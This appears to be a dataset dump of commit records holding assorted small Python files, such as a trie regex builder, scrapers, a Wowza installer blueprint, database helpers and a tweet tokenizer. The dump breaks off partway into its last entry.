commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
20cebf2b93a310dac4c491b5a59f1a2846f51073 | Add basic implementation | triegex/__init__.py | triegex/__init__.py | __all__ = ('Triegex',)
class TriegexNode:
def __init__(self, char: str, childrens=()):
self.char = char
self.childrens = {children.char: children for children in childrens}
def render(self):
if not self.childrens:
return self.char
return self.char + r'(?:{0})'.format(
r'|'.join(
[children.render() for key, children in sorted(self.childrens.items())]
)
)
class Triegex:
def __init__(self, *words):
self._root = TriegexNode('')
for word in words:
self.add(word)
def add(self, word: str):
current = self._root
for letter in word:
current = current.childrens.setdefault(letter, TriegexNode(letter))
def render(self):
return self._root.render()
def __iter__(self):
return self
if __name__ == '__main__':
triegex = Triegex('spam', 'eggs')
triegex.add('foo')
triegex.add('bar')
triegex.add('baz')
print(triegex.render())
import re
print(re.findall(triegex.render(), 'baz spam eggs')) | Python | 0.000002 | |
a4ba072e7a136fe1ebb813a1592bf5c378fd855b | 优化了乌龟吃鱼游戏” | turtle_fish_game.py | turtle_fish_game.py | import random
class Turtle:
energy = 50
x = random.randint(0, 10)
y = random.randint(0, 10)
def __init__(self, name):
self.name = name
def moving(self):
move = random.choice([-2,-1,1,2])
direction = random.choice(['x','y'])
print('Turtle{0} move {1}, on {2}'.format(self.name, move, direction))
if direction == 'x':
position = self.x + move
if 0 <= position <= 10:
self.x += move
elif position < 0:
self.x = - (self.x + move)
elif position > 10:
self.x = 10 + (10 - (self.x + move))
if direction == 'y':
position = self.y + move
if 0 <= position <= 10:
self.y += move
elif position < 0:
self.y = - (self.y + move)
elif position > 10:
self.y = 10 + (10 - (self.y + move))
self.energy -= 1
print('Turtle{0} Position: x={1}, y={2}, energy={3}, '.format(self.name,self.x, self.y, self.energy))
class Fish:
x = random.randint(0, 10)
y = random.randint(0, 10)
def __init__(self, name):
self.name = name
def moving(self):
move = random.choice([-1, 1])
direction = random.choice(['x','y'])
if direction == 'x':
position = self.x + move
if 0 <= position <= 10:
self.x += move
elif position < 0:
self.x = - (self.x + move)
elif position > 10:
self.x = 10 + (10 - (self.x + move))
if direction == 'y':
position = self.y + move
if 1 <= position <= 10:
self.y += move
elif position < 0:
self.y = - (self.y + move)
elif position > 10:
self.y = 10 + (10 - (self.y + move))
print('Fish{0} Position: x={1}, y={2}'.format(self.name, self.x, self.y))
class Pool:
def __init__(self, turtle_num=2, fish_num=10):
self.turtle_num = turtle_num
self.fish_num = fish_num
self.turtle_list = []
for i in range(self.turtle_num):
self.turtle_list.append(Turtle(str(i+1)))
self.fish_list = []
for i in range(self.fish_num):
self.fish_list.append(Fish(str(i+1)))
pool = Pool(3,10)
while len(pool.turtle_list) > 0 and len(pool.fish_list) > 0:
for each in pool.turtle_list:
if each.energy > 0:
each.moving()
else:
pool.turtle_list.remove(each)
print('Turtle{0} have no energy!!!!'.format(each.name))
for eachfish in pool.fish_list:
eachfish.moving()
for eachturtle in pool.turtle_list:
if eachfish.x == eachturtle.x and eachfish.y == eachturtle.y:
print('Turtle{0} catch Fish{1}!! It get 20 energy!!!'.format(eachturtle.name,eachfish.name))
eachturtle.energy += 20
pool.fish_list.remove(eachfish)
if len(pool.fish_list) == 0:
print('There is no fish!! Game Over!!')
if len(pool.turtle_list) == 0:
print('The turtles have no energy!! Game Over!!!')
#日志:
#6月写的L37_t1_turtle.py.作业里,乌龟和10个fish的类对象都是手动建立的。
#10月改进时增加的池子类,可以将乌龟和鱼的初始化在建立池对象的同时完成,
#而在池子里发生的事件不需要对象的名称,所以不用纠结变量名的可视化,
#把对象放进列表里迭代即可
| Python | 0 | |
465956eb780ace1835e08ca2c87895d7ff1326cf | save a legacy script, may have to use again some year | util/wisc_ingest.py | util/wisc_ingest.py | import subprocess
import os
import glob
import mx.DateTime
sts = mx.DateTime.DateTime(2011,12,1)
ets = mx.DateTime.DateTime(2012,1,1)
WANT = ['EAST-CONUS','NHEM-COMP','SUPER-NATIONAL','NHEM-MULTICOMP','WEST-CONUS']
def dodate(now, dir):
base = now.strftime("/mesonet/gini/%Y_%m_%d/sat/"+dir)
for (d2,bogus,files) in os.walk(base):
if len(files) == 0:
continue
for file in files:
cmd = "cat %s/%s | /usr/bin/python gini2gis.py" % (d2, file)
print cmd
subprocess.call(cmd, shell=True)
now = sts
while now < ets:
for dir in WANT:
dodate(now, dir)
now += mx.DateTime.RelativeDateTime(days=1)
| Python | 0 | |
099151db3a18384ebb4b7abc17c1a38567e5d2cb | add crash scan for reporting | utils/crash_scan.py | utils/crash_scan.py | #!/usr/bin/python
import subprocess
import re
import os
p = subprocess.Popen(['adb', 'devices'], stdout=subprocess.PIPE)
res = p.communicate()[0].split('\n')
res.pop(0)
devices = []
for li in res:
m = re.search('(\w+)', li)
if(m is not None):
devices.append(m.group(0))
total_crash_num = 0
crash_stat_url = 'https://crash-stats.mozilla.com/report/index/'
for dev in devices:
os.environ['ANDROID_SERIAL'] = dev
crash_num = 0
base_dir = "/data/b2g/mozilla/Crash Reports/"
scan_cmd = ['adb', 'shell', 'ls -l']
submit_dir = base_dir + 'submitted'
pending_dir = base_dir + 'pending'
p = subprocess.Popen(scan_cmd + [submit_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = p.communicate()[0]
crash_id = []
if "No such" not in output:
for out in output.split('\n'):
if out.strip() != "":
cid = re.search('\sbp-(\S+)\.txt$', out.strip()).group(1)
crash_id.append(cid)
crash_num += 1
q = subprocess.Popen(scan_cmd + [pending_dir], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = q.communicate()[0]
if "No such" not in output:
for out in output.split('\n'):
if out.strip() != "":
crash_num += 1
print("device " + dev + " has " + str(crash_num) + " crashes.")
total_crash_num += crash_num
if crash_id:
print("Submitted: ")
for cid in crash_id:
print(crash_stat_url + cid)
print("Total crash number = " + str(total_crash_num))
| Python | 0 | |
9ddb89b4b652fb3026632ffd79dea9321f58cc31 | bump version in __init__.py | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.16.4'
|
VERSION = '0.16.3.1'
| Python | 0.000023 |
9d994180a38976939e5da1757303ef8ed76f5e07 | bump version in __init__.py | oneflow/__init__.py | oneflow/__init__.py |
VERSION = '0.19.1'
|
VERSION = '0.19'
| Python | 0.000023 |
aaca641f968bf12eb2177460f8cf809d62ea3bd4 | Add a strict version of itertools.groupby | bidb/utils/itertools.py | bidb/utils/itertools.py | from __future__ import absolute_import
import itertools
def groupby(iterable, keyfunc, sortfunc=lambda x: x):
return [
(x, list(sorted(y, key=sortfunc)))
for x, y in itertools.groupby(iterable, keyfunc)
]
| Python | 0.000003 | |
d2c414576cfcf935ed36ffe2c5fb594911be0832 | work on sge module started | sge.py | sge.py | from collections import OrderedDict
__author__ = 'sfranky'
from lxml import etree
fn = '/home/sfranky/PycharmProjects/results/gef_sge1/qstat.F.xml.stdout'
tree = etree.parse(fn)
root = tree.getroot()
def extract_job_info(elem, elem_text):
"""
inside elem, iterates over subelems named elem_text and extracts relevant job information
"""
jobs = []
for subelem in elem.iter(elem_text):
job = dict()
job['job_state'] = subelem.find('./state').text
job['job_name'] = subelem.find('./JB_name').text
job['job_owner'] = subelem.find('./JB_owner').text
job['job_slots'] = subelem.find('./slots').text
job['job_nr'] = subelem.find('./JB_job_number').text
jobs.append(job)
# print '\t' + job['job_state'], job['job_name'], job['job_owner'], job['job_slots'], job['job_nr']
return jobs
worker_nodes = list()
for queue_elem in root.iter('Queue-List'):
d = OrderedDict()
queue_name = queue_elem.find('./resource[@name="qname"]').text
d['domainname'] = host_name = queue_elem.find('./resource[@name="hostname"]').text
slots_total = queue_elem.find('./slots_total').text
d['np'] = queue_elem.find('./resource[@name="num_proc"]').text
slots_used = queue_elem.find('./slots_used').text
slots_resv = queue_elem.find('./slots_resv').text
# print queue_name, host_name, slots_total, slots_used, slots_resv
running_jobs = extract_job_info(queue_elem, 'job_list')
d['core_job_map'] = [{'core': idx, 'job': job['job_nr']} for idx, job in enumerate(running_jobs)]
worker_nodes.append(d)
job_info_elem = root.find('./job_info')
# print 'PENDING JOBS'
pending_jobs = extract_job_info(job_info_elem, 'job_list')
| Python | 0 | |
482a2639911b676bf68dcd529dcc1ffecaaf10ea | Create shortner.py | plugins/shortner.py | plugins/shortner.py | Python | 0.000002 | ||
5ae58621bd766aeaa6f1838397b045039568887c | Add driver to find plate solutions | platesolve.py | platesolve.py | import babeldix
import sys
import operator
# Print solutions in order of increasing score
for plate in sys.argv[1:]:
solns = babeldix.Plates.get_solutions(plate)
for (soln,score) in sorted(solns.items(), key=operator.itemgetter(1)):
print '{0:s} {1:d} {2:s}'.format(plate,score,soln)
| Python | 0 | |
c1bfe92878edc3f9598a6d97046775cb8d9b0aa0 | Make migration for item-visibility change | depot/migrations/0009_auto_20170330_1342.py | depot/migrations/0009_auto_20170330_1342.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-30 13:42
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('depot', '0008_auto_20170330_0855'),
]
operations = [
migrations.AlterField(
model_name='item',
name='visibility',
field=models.CharField(choices=[('1', 'public'), ('2', 'private'), ('3', 'deleted')], max_length=1),
),
]
| Python | 0.000006 | |
03ecddce6f34d04957ca5161eb7d776daf02ed47 | Add blobdb messages | protocol/blobdb.py | protocol/blobdb.py | __author__ = 'katharine'
from base import PebblePacket
from base.types import *
class InsertCommand(PebblePacket):
key_size = Uint8()
key = BinaryArray(length=key_size)
value_size = Uint16()
value = BinaryArray(length=value_size)
class DeleteCommand(PebblePacket):
key_size = Uint8()
key = BinaryArray(length=key_size)
class ClearCommand(PebblePacket):
pass
class BlobCommand(PebblePacket):
command = Uint8()
token = Uint16()
database = Uint8()
content = Union(command, {
0x01: InsertCommand,
0x04: DeleteCommand,
0x05: ClearCommand,
})
| Python | 0 | |
cf0310a7111bdb79b4bbe2a52095c8344778c80c | Add admin.py for protocols | protocols/admin.py | protocols/admin.py | from django.contrib import admin
from .models import Protocol
admin.site.register(Protocol) | Python | 0 | |
98ed7f3f682bf1ba23bb0030aa81e8fff23e54ad | Add harvester | scrapi/harvesters/uow.py | scrapi/harvesters/uow.py | '''
Harvester for the Research Online for the SHARE project
Example API call: http://ro.uow.edu.au/do/oai/?verb=ListRecords&metadataPrefix=oai_dc
'''
from __future__ import unicode_literals
from scrapi.base import OAIHarvester
class UowHarvester(OAIHarvester):
short_name = 'uow'
long_name = 'University of Wollongong Research Online'
url = 'http://ro.uow.edu.au'
base_url = 'http://ro.uow.edu.au/do/oai/'
property_list = ['date', 'source', 'identifier', 'type', 'format', 'setSpec']
timezone_granularity = True
| Python | 0.000012 | |
1b4ca9e9afccfc1492aeea955f2cd3c783f1dc80 | Create file_parser.py | file_parser.py | file_parser.py | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 19 17:03:35 2015
@author: pedro.correia
"""
from __future__ import division # Just making sure that correct integer division is working
import numpy as np # This is numpy,python numerical library
import xlrd as xcl # This library allow you to manipulate (read and write) excel files
import cPickle as pickle # Library used to save and load dictionaries
import objects_parser as obj # Our local objects library.
def __open_excel_book__(path):
"""
NOTE: internal function. Use open_excel_file function.
User gives a string path and this function returns the open excel book.
"""
book = xcl.open_workbook(path,on_demand=True)
return book
def __array_by_type__(sheet,col,null=-999):
"""
NOTE: internal function. Use open_excel_file function.
This function receives sheet and column number and returns an array with the
correct type. The null is by default -999 but you can change it on the third
argument.
"""
try:
float(sheet.cell_value(1, col))
return np.zeros(sheet.nrows,dtype=type(sheet.cell_value(1, col))),null
except ValueError:
return np.zeros(sheet.nrows,dtype='|S15'),str(null) #type(sheet.cell_value(1, col))),str(null)
def __build_excel_dictionary__(book,null=-999):
"""
NOTE: internal function. Use open_excel_file function.
Function that receives an excel book (see: __open_excel_book__) and extracts to
dictionaries (with numpy arrays) all information from the excel book. Empty
cells are given the null value (default is -999).
"""
sheet_dictionary = {}
for name in book.sheet_names():
sheet = book.sheet_by_name(name)
local_dictionary = {}
for col in xrange(sheet.ncols):
local_array,null = __array_by_type__(sheet,col,null)
for row in xrange(1,sheet.nrows):
if sheet.cell_type(row, col) in (xcl.XL_CELL_EMPTY, xcl.XL_CELL_BLANK):
local_array[row] = null
else:
local_array[row] = sheet.cell_value(row, col)
local_dictionary[sheet.cell_value(0, col)] = local_array
sheet_dictionary[name] = local_dictionary
return sheet_dictionary
def open_excel_file(path,null=-999):
"""
Function that opens excel file into a excel_class_object and return the
last.
"""
book = __open_excel_book__(path)
data = obj.excelObject(__build_excel_dictionary__(book,null),null)
return data
def save_excel_object(path,obj):
"""
Saves excel object to file. Give path and excel object.
"""
with open(path, 'wb') as outfile:
pickle.dump(obj.me, outfile, protocol=pickle.HIGHEST_PROTOCOL)
def open_excel_object(path,null=-999):
"""
Creates an excel object from epy (pickle) loaded file.
"""
return obj.excelObject(pickle.load(open(path, "rb" )),null)
| Python | 0 | |
26d364765cdb0e4e4bf755286d92c305b8dabb0c | Add files via upload | find_qCodes.py | find_qCodes.py | __author__ = 'zoorobmj'
import re
import csv
import os
if __name__ == '__main__':
folder = "C:\Users\zoorobmj\PycharmProjects\Question_Matrix" # my directory
files = [f for f in os.listdir(folder) if f.endswith('.txt')]
q_list = []
for f in folder:
Qs = open('CoreESP2016.txt', 'r').read()
# print Qs
# find all meeting this pattern
# get unique values
# return as csv
q_codes = re.findall(r"[A-Z]+[A-Z0-9]*[.]", Qs)
q_list.append(q_codes)
with open("CoreESP2016.csv", 'wb') as output:
writer = csv.writer(output, lineterminator='\n')
for val in q_list:
if len(val)==2:
print val
else:
writer.writerow([val]) | Python | 0 | |
5ae45bfbbd6559d344eb641853ef8e83b3ff1c90 | Add wowza blueprint | blues/wowza.py | blues/wowza.py | """
Wowza Blueprint
===============
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.wowza
"""
from fabric.decorators import task
from refabric.api import run, info
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['start', 'stop', 'restart', 'setup', 'configure']
blueprint = blueprints.get(__name__)
start = debian.service_task('WowzaStreamingEngine', 'start')
stop = debian.service_task('WowzaStreamingEngine', 'stop')
restart = debian.service_task('WowzaStreamingEngine', 'restart')
wowza_root ='/usr/local/WowzaMediaServer/'
@task
def setup():
"""
Install and configure Wowza
"""
install()
configure()
def install():
with sudo():
info('Downloading wowza')
version = blueprint.get('wowza_version', '4.1.2')
binary = 'WowzaStreamingEngine-{}.deb.bin'.format(version)
version_path = version.replace('.', '-')
url = 'http://www.wowza.com/downloads/WowzaStreamingEngine-{}/{}'.format(version_path,
binary)
run('wget -P /tmp/ {url}'.format(url=url))
debian.chmod('/tmp/{}'.format(binary), '+x')
info('Installing wowza')
run('/tmp/{}'.format(binary))
@task
def configure():
"""
Configure Wowza
"""
| Python | 0 | |
0e53f398bf2cf885393865ec1f899308bb56625b | Add a low-level example for creating views. | examples/create_a_view_low_level.py | examples/create_a_view_low_level.py | """
A low level example:
This is how JenkinsAPI creates views
"""
import requests
import json
url = 'http://localhost:8080/newView'
str_view_name = "ddsfddfd"
params = {}# {'name': str_view_name}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = {
"mode": "hudson.model.ListView",
#"Submit": "OK",
"name": str_view_name
}
# Try 1
result = requests.post(url, params=params, data={'json':json.dumps(data)}, headers=headers)
print result.text.encode('UTF-8')
| Python | 0 | |
4c73cad398d5dac85b264187f709a860f356b311 | Add new file with mixin for mysql | smipyping/_mysqldbmixin.py | smipyping/_mysqldbmixin.py | #!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
from mysql.connector import MySQLConnection
class MySQLDBMixin(object):
"""
Provides some common methods to mixin in with the MySQL...Tables
classes
"""
def connectdb(self, db_dict, verbose):
"""Connect the db"""
try:
connection = MySQLConnection(host=db_dict['host'],
database=db_dict['database'],
user=db_dict['user'],
password=db_dict['password'])
if connection.is_connected():
self.connection = connection
if verbose:
print('sql db connection established. host %s, db %s' %
(db_dict['host'], db_dict['database']))
else:
print('SQL database connection failed. host %s, db %s' %
(db_dict['host'], db_dict['database']))
raise ValueError('Connection to database failed')
except Exception as ex:
raise ValueError('Could not connect to sql database %r. '
' Exception: %r'
% (db_dict, ex))
def _load_table(self):
"""
Load the internal dictionary from the database based on the
fields definition
"""
try:
cursor = self.connection.cursor(dictionary=True)
fields = ', '.join(self.fields)
sql = 'SELECT %s FROM %s' % (fields, self.table_name)
cursor.execute(sql)
rows = cursor.fetchall()
for row in rows:
key = row[self.key_field]
self.data_dict[key] = row
except Exception as ex:
raise ValueError('Error: setup sql based targets table %r. '
'Exception: %r'
% (self.db_dict, ex))
| Python | 0 | |
206c99420101655d7495000d659d571ef729300b | Add areas spider | soccerway/spiders/areas.py | soccerway/spiders/areas.py | # -*- coding: utf-8 -*-
import scrapy
from soccerway.items import Match
from urllib.parse import urlencode
class AreasSpider(scrapy.Spider):
name = "areas"
allowed_domains = ["http://www.soccerway.mobi"]
start_urls = ['http://www.soccerway.mobi/?']
params = {
"sport": "soccer",
"page": "leagues",
"view" : "by_area",
"area_id" : "212",
"localization_id": "www"
}
def start_requests(self):
for i in range(8,11):
self.params['area_id'] = str(i)
request = scrapy.Request(url=self.start_urls[0]+urlencode(self.params), callback=self.parse)
request.meta['proxy'] = 'http://127.0.0.1:8118'
yield request
def parse(self, response):
self.log('URL: {}'.format(response.url))
"""
def parse(self, response):
venue = Venue()
venue['country'], venue['city'], venue['name'] = response.css('title::text')[0].extract().split(',')
res = response.xpath('//td//b/text()')
if len(res) > 0:
venue['opened'] = res[0].extract()
res = response.xpath('//td//b/text()')
if len(res) > 1:
venue['capacity'] = res[1].extract()
venue['lat'], venue['lng'] = response.xpath('//script/text()')[1].re(r'\((.*)\)')[1].split(',')
return venue
"""
| Python | 0.000002 | |
171de05d8ea4a31b0f97c38206b44826364d7693 | Add http_status.py | netlib/http_status.py | netlib/http_status.py |
CONTINUE = 100
SWITCHING = 101
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
MULTIPLE_CHOICE = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTH_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE_SPACE = 507
NOT_EXTENDED = 510
RESPONSES = {
# 100
CONTINUE: "Continue",
SWITCHING: "Switching Protocols",
# 200
OK: "OK",
CREATED: "Created",
ACCEPTED: "Accepted",
NON_AUTHORITATIVE_INFORMATION: "Non-Authoritative Information",
NO_CONTENT: "No Content",
RESET_CONTENT: "Reset Content.",
PARTIAL_CONTENT: "Partial Content",
MULTI_STATUS: "Multi-Status",
# 300
MULTIPLE_CHOICE: "Multiple Choices",
MOVED_PERMANENTLY: "Moved Permanently",
FOUND: "Found",
SEE_OTHER: "See Other",
NOT_MODIFIED: "Not Modified",
USE_PROXY: "Use Proxy",
# 306 not defined??
TEMPORARY_REDIRECT: "Temporary Redirect",
# 400
BAD_REQUEST: "Bad Request",
UNAUTHORIZED: "Unauthorized",
PAYMENT_REQUIRED: "Payment Required",
FORBIDDEN: "Forbidden",
NOT_FOUND: "Not Found",
NOT_ALLOWED: "Method Not Allowed",
NOT_ACCEPTABLE: "Not Acceptable",
PROXY_AUTH_REQUIRED: "Proxy Authentication Required",
REQUEST_TIMEOUT: "Request Time-out",
CONFLICT: "Conflict",
GONE: "Gone",
LENGTH_REQUIRED: "Length Required",
PRECONDITION_FAILED: "Precondition Failed",
REQUEST_ENTITY_TOO_LARGE: "Request Entity Too Large",
REQUEST_URI_TOO_LONG: "Request-URI Too Long",
UNSUPPORTED_MEDIA_TYPE: "Unsupported Media Type",
REQUESTED_RANGE_NOT_SATISFIABLE: "Requested Range not satisfiable",
EXPECTATION_FAILED: "Expectation Failed",
# 500
INTERNAL_SERVER_ERROR: "Internal Server Error",
NOT_IMPLEMENTED: "Not Implemented",
BAD_GATEWAY: "Bad Gateway",
SERVICE_UNAVAILABLE: "Service Unavailable",
GATEWAY_TIMEOUT: "Gateway Time-out",
HTTP_VERSION_NOT_SUPPORTED: "HTTP Version not supported",
INSUFFICIENT_STORAGE_SPACE: "Insufficient Storage Space",
NOT_EXTENDED: "Not Extended"
}
| Python | 0.000501 | |
922cdfeeda103cf0ec21ad0e40ca5034dedfc03d | Add fixup_headers script based on that in MOOSE | scripts/fixup_headers.py | scripts/fixup_headers.py | #!/usr/bin/env python2
# This script checks and can optionally update Zapdos source files.
# You should always run this script without the "-u" option
# first to make sure there is a clean dry run of the files that should
# be updated
# This is based on a script of the same name in the MOOSE Framework
import os, string, re, shutil
from optparse import OptionParser
global_ignores = ['contrib', '.svn', '.git', 'crane', 'moose', 'squirrel']
unified_header = """\
//* This file is part of Zapdos, an open-source
//* application for the simulation of plasmas
//* https://github.com/shannon-lab/zapdos
//*
//* Zapdos is powered by the MOOSE Framework
//* https://www.mooseframework.org
//*
//* Licensed under LGPL 2.1, please see LICENSE for details
//* https://www.gnu.org/licenses/lgpl-2.1.html"""
python_header = """\
#* This file is part of Zapdos, an open-source
#* application for the simulation of plasmas
#* https://github.com/shannon-lab/zapdos
#*
#* Zapdos is powered by the MOOSE Framework
#* https://www.mooseframework.org
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html"""
global_options = {}
def fixupHeader():
for dirpath, dirnames, filenames in os.walk(os.getcwd() + ""):
# Don't traverse into ignored directories
for ignore in global_ignores:
if ignore in dirnames:
dirnames.remove(ignore)
#print dirpath
#print dirnames
for file in filenames:
suffix = os.path.splitext(file)
if (suffix[-1] == '.C' or suffix[-1] == '.h') and not global_options.python_only:
checkAndUpdateCPlusPlus(os.path.abspath(dirpath + '/' + file))
if suffix[-1] == '.py' and not global_options.cxx_only:
checkAndUpdatePython(os.path.abspath(dirpath + '/' + file))
def checkAndUpdateCPlusPlus(filename):
# Don't update soft links
if os.path.islink(filename):
return
f = open(filename)
text = f.read()
f.close()
header = unified_header
# Check (exact match only)
if (string.find(text, header) == -1 or global_options.force == True):
# print the first 10 lines or so of the file
if global_options.update == False: # Report only
print filename + ' does not contain an up to date header'
if global_options.verbose == True:
print '>'*40, '\n', '\n'.join((text.split('\n', 10))[:10]), '\n'*5
else:
# Make sure any previous C-style header version is removed
text = re.sub(r'^/\*+/$.*^/\*+/$', '', text, flags=re.S | re.M)
# Make sure that any previous C++-style header (with extra character)
# is also removed.
text = re.sub(r'(?:^//\*.*\n)*', '', text, flags=re.M)
# Now cleanup extra blank lines
text = re.sub(r'\A(^\s*\n)', '', text)
suffix = os.path.splitext(filename)
if suffix[-1] == '.h':
text = re.sub(r'^#ifndef\s*\S+_H_?\s*\n#define.*\n', '', text, flags=re.M)
text = re.sub(r'^#endif.*\n[\s]*\Z', '', text, flags=re.M)
# Update
f = open(filename + '~tmp', 'w')
f.write(header + '\n\n')
f.write(text)
f.close()
os.rename(filename + '~tmp', filename)
def checkAndUpdatePython(filename):
f = open(filename)
text = f.read()
f.close()
header = python_header
# Check (exact match only)
if (string.find(text, header) == -1):
# print the first 10 lines or so of the file
if global_options.update == False: # Report only
print filename + ' does not contain an up to date header'
if global_options.verbose == True:
print '>'*40, '\n', '\n'.join((text.split('\n', 10))[:10]), '\n'*5
else:
# Save off the shebang line if it exists
m = re.match(r'#!.*\n', text)
shebang = ''
if m:
shebang = m.group(0)
text = re.sub(r'^.*\n', '', text)
# Save off any pytlint disable directives
m = re.match(r'\A#pylint:\s+disable.*\n', text)
pylint_disable = ''
if m:
pylint_disable = m.group(0)
text = re.sub(r'^.*\n', '', text)
pylint_enable = False
if re.search(r'#pylint: enable=missing-docstring', text) != None:
pylint_enable = True
# Make sure any previous box-style header version is removed
text = re.sub(r'\A(?:#.*#\n)*', '', text)
# Make sure any previous version of the new header is removed
text = re.sub(r'^#\*.*\n', '', text, flags=re.M)
# Discard any pylint missing-docstring commands
text = re.sub(r'\A#pylint:.*missing-docstring.*\n', '', text)
# Now cleanup extra blank lines at the beginning of the file
text = re.sub(r'\A(^\s*\n)', '', text)
# Update
f = open(filename + '~tmp', 'w')
f.write(shebang)
f.write(pylint_disable)
f.write(header + '\n')
if pylint_enable:
f.write('#pylint: enable=missing-docstring\n')
if len(text) != 0:
f.write('\n' + text)
f.close()
shutil.copystat(filename, filename + '~tmp')
os.rename(filename + '~tmp', filename)
if __name__ == '__main__':
parser = OptionParser()
parser.add_option("-u", "--update", action="store_true", dest="update", default=False)
parser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False)
parser.add_option("--python-only", action="store_true", dest="python_only", default=False)
parser.add_option("--cxx-only", action="store_true", dest="cxx_only", default=False)
parser.add_option("-f", "--force", action="store_true", dest="force", default=False)
(global_options, args) = parser.parse_args()
fixupHeader()
| Python | 0.000001 | |
e7a2ec9b38b69a852667cca8d5c7da3ff242ce61 | Add processTweets.py | processTweets.py | processTweets.py | import json
import re
import operator
import string
import collections
from collections import Counter
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
#Setup regex to ingore emoticons
emoticons_str = r"""
(?:
[:=;] Eyes
[oO\-]? # Nose (optional)
[D\)\]\(\]/\\OpP] # Mouth
)"""
#Setup regex to split mentions, hashtags, urls, etc. together
regex_str = [
emoticons_str,
r'<[^>]+>', #HTML tags
r'(?:@[\w_]+)', #@-mentions
r"(?:\#+[\w_]+[\w\'_\-]*[\w_]+)", #hashtags
r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs
r'(?:(?:\d+,?)+(?:\.?\d+)?)', #numbers
r"(?:[a-z][a-z'\-_]+[a-z])", #words with - and '
r'(?:[\w_]+)', #other words
r'(?:\S)' #anything else
]
tokens_re = re.compile(r'('+'|'.join(regex_str)+')', re.VERBOSE | re.IGNORECASE)
emoticon_re = re.compile(r'^'+emoticons_str+'$', re.VERBOSE | re.IGNORECASE)
def tokenize(s):
return tokens_re.findall(s)
def preprocess(s, lowercase=False):
tokens = tokenize(s)
if lowercase:
tokens = [token if emoticon_re.search(token) else token.lower() for token in tokens]
for token in tokens:
token = token.encode('utf-8')
return tokens
punctuation = list(string.punctuation)
others = ['RT', 'via', u'\u2026', 'The', u'\u2019', 'amp']
stop = stopwords.words('english') + punctuation + others
#Find most common words
def terms_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_stop = [term for term in preprocess(tweet['text'])
if term not in stop and not term.startswith(('#', '@'))]
count_all.update(terms_stop)
print(count_all.most_common(number))
#Find most common hashtags
def hash_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_hash = [term for term in preprocess(tweet['text'])
if term not in stop if term.startswith('#')]
count_all.update(terms_hash)
print(count_all.most_common(number))
#Find most common mentions
def mentions_only(fname, number):
with open(fname, 'r') as f:
count_all = Counter()
for line in f:
tweet = json.loads(line)
terms_mentions = [term for term in preprocess(tweet['text'])
if term not in stop if term.startswith('@')]
count_all.update(terms_mentions)
print(count_all.most_common(number))
#Find most common two-term occurances
def cooccurances(fname, number):
with open(fname, 'r') as f:
com = collections.defaultdict(lambda: collections.defaultdict(int))
for line in f:
tweet = json.loads(line)
terms_only = [term for term in preprocess(tweet['text'])
if term not in stop and not term.startswith(('#', '@'))]
for i in range(len(terms_only)):
for j in range(i+1, len(terms_only)):
w1, w2 = sorted([terms_only[i], terms_only[j]])
if w1 != w2:
com[w1][w2] += 1
com_max = []
for t1 in com:
t1_max_terms = sorted(com[t1].items(), key=operator.itemgetter(1), reverse=True)[:number]
for t2, t2_count in t1_max_terms:
com_max.append(((t1, t2), t2_count))
terms_max = sorted(com_max, key=operator.itemgetter(1), reverse=True)
print(terms_max[:number])
#Main Function Begins
if __name__ == "__main__":
fname = "tweets.json"
number = 10
print "Terms only"
terms_only(fname, number)
print "\nHashtags only"
hash_only(fname, number)
print "\nMentions only"
mentions_only(fname, number)
print "\nCooccurances"
cooccurances(fname, number)
| Python | 0.000001 | |
e39bce6ba02ad4ed3c20768c234606afb48ac86a | Solve Largest Product | python/euler008.py | python/euler008.py | #!/bin/python3
import sys
